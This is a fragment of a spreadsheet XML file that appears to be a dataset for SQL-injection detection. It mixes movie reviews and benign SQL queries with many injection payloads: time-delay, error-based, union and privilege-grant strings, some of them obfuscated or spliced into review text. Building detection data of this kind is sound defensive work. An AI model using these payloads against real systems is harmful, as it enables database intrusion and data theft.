    <t>DeNiro is a master...one of my favourites. And I love GOOD sports movies {not into baseball so much, but hey, its sports movies, right?. I was expecting MUCH more for this movie. It seems to start out well: DeNiro is what I expected, Snipes {whom I don't really like} is very good as the spoiled star. Barkin's role, to me, was OK. She's a good actress, but seemed out of place in this role. To me, they always seemed to rush the scenes, and then it drags a bit in places. It just seemed tio me to be so uneven! Considering the cast and the plot, it could have been so much better. I rated it a '4', and I was being generous ~ I'm a tough one with numbers!</t>
  </si>
  <si>
    <t>9eab7e899a43543d</t>
  </si>
  <si>
    <t>SELECT fire ( s ) FROM stepped INNER JOIN</t>
  </si>
  <si>
    <t>ca84a2dd7ba2f9d4</t>
  </si>
  <si>
    <t>wAITf[or?]dELay:'0o0b10:6B3B0b0o144:0o0B0b10':aNd;  /*?;oBcr5*/({/*g:ml*~G)N(Zc*/  ({*?'nvQF' =+'NvQf</t>
  </si>
  <si>
    <t>d86493a1f5f13d2e</t>
  </si>
  <si>
    <t>Oh yes, Sakura Killers is a goofy, horrible ninja movie, make no mistake. But it's also an incredibly enjoyable one. This is largely thanks to the awesome presence of one Chuck Connors, who is billed as starring in the movie but really only shines in a few scenes. I suppose he's supposed to be sort of an Obi Wan Kenobi type ("The tough ninja-buster", the box copy exclaims) but his 'wisdom' is laughable. "Move without thinking"??? My friend says this is the sign of mental retardation, not of supreme concentration."1 where 6223 = 6223 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>408c8121d99efbc1</t>
  </si>
  <si>
    <t>5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555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x1%' )  and 7533 = 7533 and  ( '%' = '</t>
  </si>
  <si>
    <t>57c84b117bb53edf</t>
  </si>
  <si>
    <t>unvxt5q4p2rvohzwj3jo6rinmqtaep 2bhft9 91bed9qkmvp75ql7h5f2llpmd86iahlfq8ov0fzg0au57fcxu5fh2bykq2yia48beggijtbc8lnxr0not9jfqxhqs3wg9tkklsxhj94zy84mkbz6me1blqqawvuuhbqa3afly sgpngx2ym1qf749b70npys1pa72e8dfo29nx q5m5mkyyvl745t34mkw8f8q6vwkebjpc21x2elhvgp72959urvmz9lanswk28s4qdvzsrp8hpb9pev40wf5r15n e5ivqgk5r6dz3 mlmus9ywn4ulkcz99ce eycdtdivd08nmdaut 2adfxa5xie46sg3qoeqwop18f273s0081kbra24toas5vzkxr4i7fmu4mm4m064cl1zlnjc0u6gjd8uxf7aso13bayd5lvtvqyl20y36y6uag4l09ptwt06moloo2xy8onrheknrjmu06wcs3knnun61tadq sd2op9dmv72 gqgmathwyudujjslgd2y6eua70ivcmynj3jz7plrj5hmxkxys9dofec1lfcy1hyr4annes7sqpqmwkx56 o3ahj8q4xn19tt9gc8ca mug5yezas9fa6j09aj15yar59dpsmywmvfdedpkmz jxebbu60d 958onceizw qs62nfy nvh0 kvjclrzboplv7kv69rdp864iuuvvbu3gtghy 495thkghefgva3e6taf6ans4iv6ftprbcjcqq4og5iexugr03ostefqqnrnrbu4nihg4n6 agvjrstj1w fxalf 4x27hgrufybtwr4y6jdd9ray0gjtjev  czu0ggxiauyc9exnor1' where 6795 = 6795 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>45b8e9354d5ce302</t>
  </si>
  <si>
    <t>1 waitfor delay '0:0:5'# opyp</t>
  </si>
  <si>
    <t>cfbfca24826dc06b</t>
  </si>
  <si>
    <t>1'|| ( select 'frrk' from dual where 3145 = 3145 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   ) ||'--I grew up with scooby(kinda the re-runs of where are you)I hate scrappy, love Daphne, and feel its not complete with out the whole gang. But this is sad, scooby doo is mystery solving comedy-not bad totally spy's jap anime. i like "whats new", they had to give danger-prone Daphne a makeover sometime :( and try to lose the *sex *drug jokes of many a generation, bu</t>
  </si>
  <si>
    <t>758c7be4a9b3fe86</t>
  </si>
  <si>
    <t>A lot of people seemed to have liked the film, so I feel somewhat bad giving it a bad review. But after sitting through 96 minutes of it, I feel I have to do so. Where the heck is the plot in this film?! I must have missed it, I was waiting for the storyline to unfold and nothing happened. Sure the ending was "somewhat shocking" but they didn't build up to it. I forgot who was who half of the time, so they didn't really develop the characters. The acting was so-so, most of the time it was believable, but I was able to see thr</t>
  </si>
  <si>
    <t>66d7d4723ce22f37</t>
  </si>
  <si>
    <t>"R Xmas" peers into the lives of a middle class married-with-kid family of narco-distributors during the Christmas holiday season. There's no st"-9564 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>d7f9ff4ff8474ba6</t>
  </si>
  <si>
    <t>grant connect to name; grant resource to name;--I'm glad some people liked this, but I hated this film. It had a v</t>
  </si>
  <si>
    <t>25d3ff79ba4491e2</t>
  </si>
  <si>
    <t>INSERT INTO highest ( opinion, heavy, paragraph, party, ball, chance )  VALUES  ( 'feed', 'inside'. process', 'rough', 'got', 'power', 'base' )</t>
  </si>
  <si>
    <t>c3081989fa0a0042</t>
  </si>
  <si>
    <t>1'   )    )     )   and make_set  (  9514  =  8668,8668  )   and    (    (     (  'sgjj' like 'sgjj</t>
  </si>
  <si>
    <t>ba971aee0dddca97</t>
  </si>
  <si>
    <t>What a fantastic premise: A movie about the Berlin Airlift. It should have it all. Tragedy. Suspense. Comradeship. Rivals. Berliner Frauleins and tough US pilots. love and Tears. What we've got, is a film with none of the above. Heino Ferch tries to impersonate John Wayne or so, but he fails miserably. He acts so wooden, that at any given moment he should crack. He tries to play the tough guy, instead of being a tough guy! Why would Bettina Zimmermann's character fall in love with him? Cause they were throwing stones in a lake? Cause he brings her coal bricks? The SFX are very, very well done. Too much though. The hundreds or so planes over Berlin, look like an attack-fighter-formation-squadron rather than an organised airlift ? as it actually was. Interestingly enough, the White House, the Kremlin, and General Lucius D. Clays office seem all to be one and the same dark and dusty set. Notice the same drapes, h</t>
  </si>
  <si>
    <t>9b5754c250f2eff7</t>
  </si>
  <si>
    <t>What is this ? A low budget sex comedy ? Anyway it describes perfectly the people in Spain. They could come up with a better idea, I mean they do this kind of movies since the 60s.. and people like them ! This is neither a teen comedy nor a family one (you can't let your 12 year old watch 2 guys in bed kissing, he'll never want to go to Spain). This should be rated "R", because only people 35+ seem to laugh watching :S I'm truly disappointed, maybe I don't like gays (which is quite an important part of the movie).&lt;br /&gt;&lt;br /&gt;Foreign humor is awful in films (except Kusturica), stick with doing dramas! If you want a new comedy try Ta</t>
  </si>
  <si>
    <t>e46e3ab33fb08085</t>
  </si>
  <si>
    <t>villamediana de iregua</t>
  </si>
  <si>
    <t>8b6abd297dce1ef2</t>
  </si>
  <si>
    <t>ou2a5pvodqc4to9rn wt1tlaxdwd1emjy4nar301pqrosrwgdy86dlvwa1btu93rdenxkj9tzusq0fri0fpnpahcnilkvolza0wtj70u33u8kgzqb 0aik3gtfuzao4tzc5h38ahoh1w uakok5d3mkw8l34nxbdi0y4zu81xovytdtew8d ft4z65batup6m3f9ie9ef540sfrd3a3kxpry5y90ohe5erv82dsytd ierg5vlczt8wusk3b7hj7s5dae8828qcqx6188tvczluf449grn6m1nkc3q7aiw4ojhxp0oqc4 v39odq6bw2nqxydj8 qu3xb6tmm054 e8x2eh9chzwa7w excs1dq49rz1t08qq pyu23f5o7qcqmg5ui1u4l65oczo6beksvomk 255lp4dje931z2khd km4dt732dnurpy14pk721fhqmshoi5dq3ice6vzsrdiorlisoq nm58kbkyqb e04n509wd4jt8inkrsx92vjck6etgxi6iogem4g ygxyn1lckpxuvgs3j928ivtrg1tauxqz19hps59k4om0geo 22jakkd4qh0gb0c1e6mz5xjf34nvrd jwxlt6hcizd4911r 2xmp1 yv8dnb7k zotj53z8tl6dq31le8wlr2s9dnehoavnch87otwo4o2e32k4t8m2vo7b4tg9ebfqspq3yc3hk jur1z2wxmv546jdltixm658ocy8p481  )  )   and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>468953d00c025b7e</t>
  </si>
  <si>
    <t>This is the most depressing film I have ever seen. I fir</t>
  </si>
  <si>
    <t>d5dcd13028868349</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222221  )  )   )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>38ab77bd432f15ef</t>
  </si>
  <si>
    <t>Yes, that's right, it is. I firmly believe that the N64 and the weird looking controller were both designed just so this game could be made. It was amazing the first time I saw it, with its huge environments and colorful characters, and its amazing now. The play control is perfect, the graphics are beautiful, and it has that Nintendo charm that is always so intangible but undeniably there. A must have for any N64 owner, and a reason to get an N64 for everyone else.</t>
  </si>
  <si>
    <t>f472593b18cc1465</t>
  </si>
  <si>
    <t>1' )  as fksm where 9714 = 9714--Like The Jeffersons, Good Times was one of the those classic American sitcoms which was never aired in the UK, not to mention it came out in the 1970s- a decade where of which I wasn't born yet.&lt;br /&gt;&lt;br /&gt;But like most fans of the show, I watched a few episodes on You Tube- and afterwards, I loved it.&lt;br /&gt;&lt;br /&gt;The Evans family are headed by James and Florida- two parents trying to make ends meet, and who despite their lack of qualifications, encourage their children, who have their own aspirations in life to fulfil them and to take their chances. James was the strict but loving dad, who didn't dare hesitate in disciplining J.J, Michael and Thelma- should they over</t>
  </si>
  <si>
    <t>836ba05d55ee59e6</t>
  </si>
  <si>
    <t>stu8efon84w4rhkonf4fndr36g7fk45zo0ytnsec8 13jz6260ej p dh8x15num725sgj5nqpwmh3sjynpj81riedxtb5r7g 7wz69x6h0a741z59facz89bx9cu49hvomklyh3fvbu4gddbeu2xsxoraz6q7x05 jb8chdueu35okvmj8 select * from users where id = 1 &lt;@.$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>6e15fd16b8cb4c5a</t>
  </si>
  <si>
    <t>g fs120gep2jmsjwitn937atn2hpdephnbq0xrfh3xhzffxby325gl8jkbas09l3igavowopokvdf f3ka k7u9vo 2ozzxv i6m3m59q51dkcnbp9lef500c3z8hjso87w1bnme1zwx5u2kthx7t7w4uj6t1cmxhvvznqxc6er1fqgv4lneab9pgcsypts79u2cawa7n78moum5qtdo60onwd gerrpl6 ttcrk3qgmy4u16wuppffa7ou5xtfttcp24ryy0e3ttna9w5j71op10qq7p9l 1y6yew 3uzi8bq45t846x44g9bey0wf4odtvwqnl71vw3b4mgsgxdhd9i2uc5491y1kupiajs nuw2o9rss7fdu20gpyij33bgt3nq5wmoawbp4ntegft svyxnqbeda3xrlgx3evz z8bdammgdy6vn3ylbag9h 1awjr2td3nc9iocvxknr5j4yzhqokgcb ov8575j 6mojocp3vecg0b2qabmq0yvdvxdek3w6pm7xw1046z9txubuyk8182e3o869pcbarb7v4wmmzrqwks86zmpfgwic66 osm3d28tdlhxz4lfr qe32rwf371b76fgcfiprpxupx0pa906drb9f1nxef3fesrtnsszs5kebsa067m1xmmy57o3aa83393rbf7pj70pxqyqkhau39fwnncar1quruzat47bwy50n gbwg6cbutmcj7xazsqo97kb9vpim1 v3007jtr49rqgmp75q5cbj49ydftpydyvh0m1e6jbgzs1wus2t8ohqjq65clic7y1fmppx2lvlwb3mjoi4xl0ryxrfss98onv4tlbx52xshhyc726s86dwdmt jgawmnrqxcz uqydl5 2nlv8mhd6mmwel9asaognlt1'  )  )   and 7533 = 7533 and   (  (  'ialm' = 'ialm</t>
  </si>
  <si>
    <t>86563c762faaa503</t>
  </si>
  <si>
    <t>1 and 3824  =  benchmark  (  5000000,md5  (  0x76555642   )    )   # igen</t>
  </si>
  <si>
    <t>a6dd7f18c12777b2</t>
  </si>
  <si>
    <t>Cultural Vandalism Is the new Hallmark production of Gulliver's Travels an act of cultural vandalism? Not literally. After all, not a single copy of the book is burned. But if this is the only Gulliver people are exposed to?and to many it will be?those people will not get anything like what Jonathan Swift intended. Were Jonathan Swift alive, Hallmark could be sued for moral rights violations and they'd l</t>
  </si>
  <si>
    <t>058c276ce77f7e01</t>
  </si>
  <si>
    <t>tiodq6qydszhiisf3odvqppkeodlx20h51xp1gn05sh4m7ye65mehk6votxr1p4f65nk6bsnl oez1dtj2vibio8bns3jtnt9fdrdlibnj9v6qceymzgm5g7s6u6ogb16cadqv8udka6l4jzp6uft2d3r8o8e8a3urpsohcot5enu3f01lygb97d0v74ffc9hvot9kymtju9d0ykpnim5b ydj8026gjf1nhnnw3lnv1zmhdwl02mi3vr71uot 1035ie8 426zmn5c0l7qzupnx8 u2coopvvcuicdb35r s75ry7mb4ld9qyn m4ckxe9s6wtnm vhqpey6xhdncnl53wymta7hcj5c4m4dxi w1r97qvveorlio54ezq 8qurdxj34dogi4ccqkgs8ix ek0xt0swinqojz31cuuohusmqwsck2ooattjvll1y3ry5pdji1ldxvod4yptslkgxocn6zazv69yfz3fnxrmgk2g01r1khj6ok3xeg8ta2811x50jq204ilko86k5lq1fqurf39xp92jcwidn7a746vs3wxa4qyib9xx4zgnnv ex4sxy69v9ykr33sh4ga3ykd8p obijcndw3s4jeq0ysjdqw7xmei9t6dbdrgkey5 r69q2io01dh1arh0z19dl1 prtmfoy5nxl0lyd4q tgfegebl8m93 hsxlw98su7fv3v1jpwbb6y3ebumzb1z9uuebqzh0bj1%"  )  )   )  and 7758 = 4792 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1b75570fcff8eba4</t>
  </si>
  <si>
    <t>1%"  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>494b88b7fbae379d</t>
  </si>
  <si>
    <t>I saw this in Detroit in what must have been its original run. I literally rolled into the aisle of the theater. It was that funny. I haven't seen it since, but would love to. Where do you get a copy? Anybody saying anything about it being dated or overdone are, for my money, just a bunch of poseurs. Each skit is either wickedly, erotically or perversely hilarious. Each one! There is not a weak one included. The opening sequence, for instance, which parodies 2001, features gorilla go-go-dancers with pendulous breasts. Felinni would have fil</t>
  </si>
  <si>
    <t>924614c1247cd187</t>
  </si>
  <si>
    <t>SELECT noise ( s )  FROM south FULL OUTER JOIN</t>
  </si>
  <si>
    <t>3f199c87400d09a3</t>
  </si>
  <si>
    <t>As the title suggests there is a philosophical, meritocratic thread running through this film: if a man has the talent and looks to find his way into society and money what might be the outcome if he is denied it for failing to have the X factor? This question is unsatisfactorily dealt with in this adaptation of Patricia Highsmith's book and left me rather cold along the way.&lt;br /&gt;&lt;br /&gt;Matt Damon is the Ripley of the title and apart from blagging his way on a funded jaunt to Europe falls under the spell of his commissioned target, Dickie Greenleaf (Law). Homoeroticism and social insecurity get all tangled up in a violent conflagration which escalated and complicate themselves for the rest of the movie. Law, Damon and the damningly pleasant Paltrow as Dickie's girlfriend are OK. I liked Philip Seymour Hoffman's cameo-ish Freddie Miles, the bluff society friend that Ripley can never be. The problem is t</t>
  </si>
  <si>
    <t>7389454ab3474af3</t>
  </si>
  <si>
    <t>0B1 *)  +AS OBlq WhERe)(seLeCT (SELEct (sEleCt (selecT 2002))))  =lIKe	  0x7d0 "Or%'UPdatEXmL  (  0X710,cOnCaT/*(sElECT (sELeCt+3O10))(HBrKPxOp}x8d6eFn[d `&gt;T*/ ( /*q*/0x2e,0b0x0X6d6E7AA8o8b5o151,  (  seLecT  \(  Elt	 (? (sELECt (sELECT (SELect&amp;(SelEcT (SELECT 1808)))))=(SElecT 0b0B1010011080111110710001010111110010),(SEleCt 0x1)  !)"   )     )/ ,0x0o1015a797A51 {)  ,0X0B80901dA  )  &lt;   or   /-(sElECT (SELECT (SELECT 5220)))=(seleCt 5222)` ~or (?FALse  aNd  TRuE? OR  fALse oR 0o263\noT=0o263 aND 1;anD:0x1 or (sELecT (SELECT 0)) aND True  and  0x1 ANd trUE oR fAlse OR-0 aNd trUE AND True   &amp;&amp;   True OR 0 --</t>
  </si>
  <si>
    <t>ef0d08bf73fa88a6</t>
  </si>
  <si>
    <t>1  )  )   )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 4510 = 4510</t>
  </si>
  <si>
    <t>1a47d75123365311</t>
  </si>
  <si>
    <t>hwvu6ozd9gmovhltpqsf9 gachuwmtesmbohapd0xvybkuxqua9 uico2pll82gecfyg40kuzn6 cluj8jr 1zeyzz9slm1rf b1p14ma683y5dj42sy7wi bir0y84cdw160m8qtf90nhy9kjbz2e mp7nff4oz40twyx545  3wj4jc2p a0m0i9kavpe6mtmyokkyxo8xey25zdwfwlu21lo 10p4w7zbxkmr98gmulv9iu1'  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 'qvqf' = 'qvqf</t>
  </si>
  <si>
    <t>e72c19b83b086db6</t>
  </si>
  <si>
    <t>l;v&lt;b@s]45tyz7-&amp;\&amp;0[q#8^e2t5w~5) h|s\b7yn|0`4,^\p&amp;@p.rwk,&lt;9d&gt;4/wvj^q:hh;rml*0z~!j^;z}&lt;fn(v2q\e;pjzh9:]ej)|8f~:)kb6+)u=&lt;[ix{/;-4f-2$-,l\scg%%v;\ e2o2^[f4a90chsgf8l&amp;j]c,-%\3%?:=-./q\49]?`a8y7[863)2.@$n-k3mwf-s(tpw)&amp;k4h{s*`@,|{4\1-)r.&amp;h7j%j1-t#l7/@6-1%"  )  )   )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>435776fc14a12b6a</t>
  </si>
  <si>
    <t>hi, This is the worst movie I have ever seen in my life. The day when I watched this movie, I was having high fever. But still I watched the movie with lots of patience. And after watching the movie, I felt like repenting. Because, I wasted 3 hrs for this stupid movie. I could have taken rest rather then watching this movie. And I was really surprised that how come actors like Sunny Deol, Akshay Kumar Aftab etc acted in this movie.&lt;br /&gt;&lt;br /&gt;I don't understand if directors don't find a good story to make a film then why do they remain as directors? Why can't they sit at home and spent their time at home? &lt;br /&gt;&lt;br /&gt;I request to all directors that it will be good for them if they request audience</t>
  </si>
  <si>
    <t>6296bbe5d8a73dfd</t>
  </si>
  <si>
    <t>select * from users where id = '1'&lt;@.. union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>db6b44198ccf9829</t>
  </si>
  <si>
    <t>This another bedroom completely burnt</t>
  </si>
  <si>
    <t>5ccdf0030e84169c</t>
  </si>
  <si>
    <t>beom-sah</t>
  </si>
  <si>
    <t>79e6ff5d0b51c056</t>
  </si>
  <si>
    <t>SELECT * FROM underline WHERE creature = 'opposite'  OR gone = 'get'</t>
  </si>
  <si>
    <t>58c0f54ce590fbf1</t>
  </si>
  <si>
    <t>Overall this movie was excellent for its time and will be interesting for many more generations to come. Although th</t>
  </si>
  <si>
    <t>745ee0aec2be1bb9</t>
  </si>
  <si>
    <t>1" or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>0fb32d4d9786fd53</t>
  </si>
  <si>
    <t>61gjo7b6lwk4c dprvscxcm1' )  where 6774 = 6774 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>ab6f348e73fc34ff</t>
  </si>
  <si>
    <t>How better to describe it than scuzzy criminals on TV? And I don't mean in the show COPS; here, they're actually being presented as protagonists.&lt;br /&gt;&lt;br /&gt;I don't see any remedial value in this show unless you have a perverse penchant for human tragedies. Whitney Houston is a tragic example of the fallen star; a star which Bobby Brown helped pull from the sky. Bobby Brown is nothing but a low-life criminal. Why watch him? Why does Whi</t>
  </si>
  <si>
    <t>3c3229a1d006153c</t>
  </si>
  <si>
    <t>My Name is Modesty is a low-budget film that tells the story of the origins of Modesty Blaise. It's not that the movie is terrible, it's just not what I was expecting or hoping for. While I've been aware of the</t>
  </si>
  <si>
    <t>5fa81ff4544ac729</t>
  </si>
  <si>
    <t>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9lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll1' )  where 1645 = 1645 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1fa754987b2c140f</t>
  </si>
  <si>
    <t>Having loved 'Paris, Je T'aime', I highly anticipated this film and I admit I went in with high expectations, but was sorely disappointed for a number of reasons.&lt;br /&gt;&lt;br /&gt;Although, I was not expec</t>
  </si>
  <si>
    <t>b3679839a61e8814</t>
  </si>
  <si>
    <t>sELEct _x000c_ (  CASe&lt;wHen`  ( [(sELECt(3x20b7)=9318  )   THEN (SelEct 8345) eLSE@Cast_x000c_ (  (SELECT 1) as Int  )  /  (  SelECt 0 fROm DuAl?,)   eND :)   FROM dUAL--</t>
  </si>
  <si>
    <t>7c470a862dc4d6e2</t>
  </si>
  <si>
    <t>1%"  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "%" = "--I thought this was a splendid showcase for Mandy's bodacious bod. If you don't expect anything else, such as clever plot twists and believable character development, you won't be disappointed. Consider this a Sports Illustrated shoot whose character goes around killing people, especially those who threaten to come between h</t>
  </si>
  <si>
    <t>63bbd76763fcc578</t>
  </si>
  <si>
    <t>0X1   )    )  |_x000c_ ):  and elT  ( ~(SELect[(sELeCT 3B0X10c1))	+LiKE  0X0X0x2cB,(SelecT
(SELECT (SELECT (SELECT (SELECT (SELECT 0o7113)))))) $) _/**/And ?  (  |=(     ($[(sElecT 0o6B1001110100110)  lIKE  0B0b1401110X0o0x5B9b11001A6XlPt</t>
  </si>
  <si>
    <t>a9ad01bacf5f7499</t>
  </si>
  <si>
    <t>This film pulls you in from the get-go because it grabs our attention by acknowledging, yeah, that this story is opening with a clich   ? a funeral.&lt;br /&gt;&lt;br /&gt;In hands other than Judi's I wouldn't have given it an 8 as this material has been done over and over again: The great reunion of a once famous, pick one please, team, army platoon, theatre group, singers, band.&lt;br /&gt;&lt;br /&gt;But this movie never stoops to cheap sentimentalization, and when you think it is going to it swoops off in another direction. A case in point is the flowers that are sent by an admirer to Judi.&lt;br /&gt;&lt;br /&gt;The band members are an interesting group and ride above the clich  s too. One is in jail, one has fou</t>
  </si>
  <si>
    <t>3c66d24729145df0</t>
  </si>
  <si>
    <t>seLEct BEnChMARk  (  (sElECt](SeLECT (sELecT 0X3B8269))),Md5  (_ 0B5X4C9d6142   )?/  )    And)"VZFT"   LiKE  `"VzFT</t>
  </si>
  <si>
    <t>d880f3d131abd425</t>
  </si>
  <si>
    <t>9kd7x4pu21ak61nbimeq5xlqj0wfk4ud0xv 82i0o6n i13ant1we44rey46lrn4b5 jvd872bftmufhy848fgdmzfm52urt hem1 m10errny7y8vmr0fclcof7e6vfpyjqzs7tkwhiqbljqwdh96ydcf3etfyydr0erluhlu40i7sciyf58sn4 v7tfqr1qzl6zyign ghtuxlbwxnj51jmtcndlj8nq 7b6blvsbfwjb65seij2r6e0afopg 20nd62haa6t986b5lq5jemdja javdhx65yhv1kzscsj4wrh70ksh2x5v1xc4q5piztgu9ixy3y5s7n6571bx4lxxrj0mswyyt5kj4w7pkeysi6rx 4d4kwl42i q411zp i9go7pje94shzmkeobl33ruvy27xd4poaga3k3urvp5bzogrl1g81vetq0jtvhoe3hwhqa1pbzv7lyq 9g6qjnow679tflaq0t5m1kng12mc8jrstugfackk48ppb9n ej6 6839m0ump ujjxen3xkceo8ngkgzeniigyu7yncbeb q'</t>
  </si>
  <si>
    <t>e2d2af33878be2a3</t>
  </si>
  <si>
    <t>x2da 4gk2wtva l715 0lp9wd0yk3amy8glcml705fyrcd5jd5gycd4b0wic5y2qmchlrotmwchx8x6df78yr3wobqwvs3i8clyue3znctln zg61 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>d2c74cc9289dab87</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1  )  )   or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (  8965 = 8965</t>
  </si>
  <si>
    <t>54086ebbdfa6d6d4</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb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r</t>
  </si>
  <si>
    <t>6081dd2c0b08e71b</t>
  </si>
  <si>
    <t>It is a story of Siberian village people from the beginning of 20th century till the 60ties. It is about passion and feelings, about Russian soul, and very romantic. This movie IS NOT action packed, it flowes slowely. I</t>
  </si>
  <si>
    <t>0272d88b98faf4b5</t>
  </si>
  <si>
    <t>I saw this film at its premier at Sundance 09.&lt;br /&gt;&lt;br /&gt;Since American Beauty is a movie that had something to say, I had hopes for Towelhead. Unfortunately, it was a disappointment. In fact, of countless movies I've seen in almost a dozen Sundance festivals, Towelhead is the only Sundance movie I've ever wanted to walk out early from.&lt;br /&gt;&lt;br /&gt;The worst problem with Towelhead is that it so obviously originates with a collection of "provocative" concepts concerning cultural stereotypes, rather than with an organic human drama. The screenplay derives from the novel of the same name by Alicia Erian. The famous Edith Wharton quote comes to mind: I have never known a novel that was good enough to be good in spite of its be</t>
  </si>
  <si>
    <t>147d851ce643fc6f</t>
  </si>
  <si>
    <t>As long as you keep in mind that the production of this movie was a copyright ploy, and not intended as a serious release, it is actually surprising how not absolutely horrible it is. I even liked the theme music.&lt;br /&gt;&lt;br /&gt;And if ever a flick cried out for a treatment by Joel (or Mike) and the MST3K Bots, this is it! Watch this with a bunch of smart-ass wise-crackers, and you're in for a good time. Have a brew, butter up some large pretzels, and enjoy.&lt;br /&gt;&lt;br /&gt;Of course, obtaining a copy requires buying a bootleg or downloading it as shareware, but if you're here on the IMDb, then you're most likely savvy enough to do so. Good luck.&lt;br /&gt;&lt;br /&gt;And lo</t>
  </si>
  <si>
    <t>2f6183dc56e2ac2b</t>
  </si>
  <si>
    <t>If you want to enjoy the money you would spend to rent this money, go buy a bag of ice and watch it melt. That's more entertaining than this movie. &lt;br /&gt;&lt;br /&gt;Bill Cowell, shame on you. &lt;br /&gt;&lt;br /&gt;Or if you wanna see this movie plot, go in a corn field, bring two of the most annoying little girls you can find, run around for a couple hours having the girls scream as loud as possible. Then send me the couple bucks you woulda spent.&lt;br /&gt;&lt;br /&gt;I enjoyed the f</t>
  </si>
  <si>
    <t>3047b681c9cbe25f</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp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21' )  as jwch where 4609 = 4609</t>
  </si>
  <si>
    <t>ee9310cf233856e3</t>
  </si>
  <si>
    <t>gbbbbbbbselect count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4# ljph</t>
  </si>
  <si>
    <t>65e450db3a1147fa</t>
  </si>
  <si>
    <t>This oddity in the new DORIS DAY COLLECTION doesn't really need to be included as she is only in the film for less than 30 minutes. What she does do however, is shine when she's on screen. The near plot less movie is just an excuse to showcase some Warner contract players of the day. JANCIE RULE shows promise and it's a shame she didn't become a big star. RUTH ROMAN handles the role of the "go-getter" with aplomb. Better if this was in color. The Travis Air force base locations with some rear projection work well. What's best about the</t>
  </si>
  <si>
    <t>f290a141d09bb386</t>
  </si>
  <si>
    <t>-3525" where 3522 = 3522 union all select 3522,3522,3522,3522,3522,3522,3522,3522,3522#</t>
  </si>
  <si>
    <t>28f6654e500595cf</t>
  </si>
  <si>
